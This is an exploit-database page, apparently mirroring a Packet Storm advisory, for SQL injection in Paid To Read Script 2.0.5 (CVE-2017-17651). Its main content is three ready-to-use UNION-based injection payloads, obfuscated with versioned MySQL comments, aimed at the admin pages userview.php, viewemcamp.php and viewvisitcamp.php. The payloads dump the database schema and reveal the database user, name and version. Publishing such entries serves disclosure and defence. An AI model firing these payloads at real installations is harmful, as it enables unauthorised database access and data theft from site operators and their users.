Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIhsan SencanPACKETSTORM:145439
HistoryDec 15, 2017 - 12:00 a.m.

Paid To Read Script 2.0.5 SQL Injection

2017-12-1500:00:00
Ihsan Sencan
packetstormsecurity.com
24

EPSS

0.002

Percentile

64.4%

JSON
`# # # # #   
# Exploit Title: Paid To Read Script 2.0.5 - SQL Injection  
# Dork: N/A  
# Date: 13.12.2017  
# Vendor Homepage: https://www.phpscriptsmall.com/  
# Software Link: https://www.phpscriptsmall.com/product/paid-to-read-script/  
# Version: 2.0.5  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: CVE-2017-17651  
# # # # #  
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Social: @ihsansencan  
# # # # #  
# Description:  
# The vulnerability allows an attacker to inject sql commands....  
#   
# Proof of Concept:   
#   
# 1)  
# http://localhost/[PATH]/admin/userview.php?uid=[SQL]  
#   
# -9++/*!08888UNION*/(/*!08888SELECT*/(1)%2c(2)%2c(3)%2c(4)%2c(5)%2c(6)%2c(7)%2c(8)%2c(9)%2c(10)%2c(11)%2c(12)%2c(13)%2c(14)%2c(15)%2c(16)%2c(17)%2c(18)%2c(19)%2c(20)%2c(21)%2c(22)%2c(23)%2c(24)%2c(25)%2c(26)%2c(27)%2c(28)%2c(29)%2c(30)%2c(31)%2c(32)%2c(33)%2c(34)%2c(35)%2c(36)%2c(37)%2c(38)%2c(39)%2c(40)%2c(41)%2c(42)%2c(43)%2c(44)%2c(45)%2c(46)%2c(47)%2c(48)%2c(/*!08888Select*/+export_set(5%2c@:=0%2c(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5%2cexport_set(5%2c@%2c/*!08888table_name*/%2c0x3c6c693e%2c2)%2c/*!08888column_name*/%2c0xa3a%2c2))%2c@%2c2))%2c(50)%2c(51)%2c(52)%2c(53)%2c(54)%2c(55)%2c(56)%2c(57)%2c(58)%2c(59)%2c(60)%2c(61)%2c(62)%2c(63)%2c(64)%2c(65)%2c(66)%2c(67)%2c(68))--+-  
#   
#   
# 2)  
# http://localhost/[PATH]/admin/viewemcamp.php?fnum=[SQL]  
#   
# -1++/*!08888UNION*/(/*!08888SELECT*/+0x253238253331253239%2cCONCAT_WS(0x203a20%2cUSER()%2cDATABASE()%2cVERSION())%2c0x253238253333253239%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239)--+-  
#   
#   
# 3)  
# http://localhost/[PATH]/admin/viewvisitcamp.php?fn=[SQL]  
#   
# -6++/*!50000UNION*/(/*!50000SELECT*/0x253238253331253239%2c0x253238253332253239%2c0x253238253333253239%2c0x253238253334253239%2cCONCAT_WS(0x203a20%2cUSER()%2cDATABASE()%2cVERSION())%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239%2c0x253238253331253333253239%2c0x253238253331253334253239)--+-  
#   
#   
# # # # #  
  
`

Related

exploitpack 1
cve 1
prion 1
zdt 1
cvelist 1
nvd 1
exploitdb 1
exploitpack
exploitpack
Paid To Read Script 2.0.5 - uid fnum fn SQL Injection
2017-12-14 00:00:00
cve
cve
CVE-2017-17651
2017-12-18 09:29:00
prion
prion
Sql injection
2017-12-18 09:29:00
zdt
zdt
Paid To Read Script 2.0.5 - uid / fnum / fn SQL Injection Vulnerability
2017-12-14 00:00:00
cvelist
cvelist
CVE-2017-17651
2017-12-18 09:00:00
nvd
nvd
CVE-2017-17651
2017-12-18 09:29:00
exploitdb
exploitdb
Paid To Read Script 2.0.5 - 'uid' / 'fnum' / 'fn' SQL Injection
2017-12-14 00:00:00

EPSS

0.002

Percentile

64.4%

JSON
Related for PACKETSTORM:145439
exploitpack1cve1prion1zdt1cvelist1nvd1exploitdb1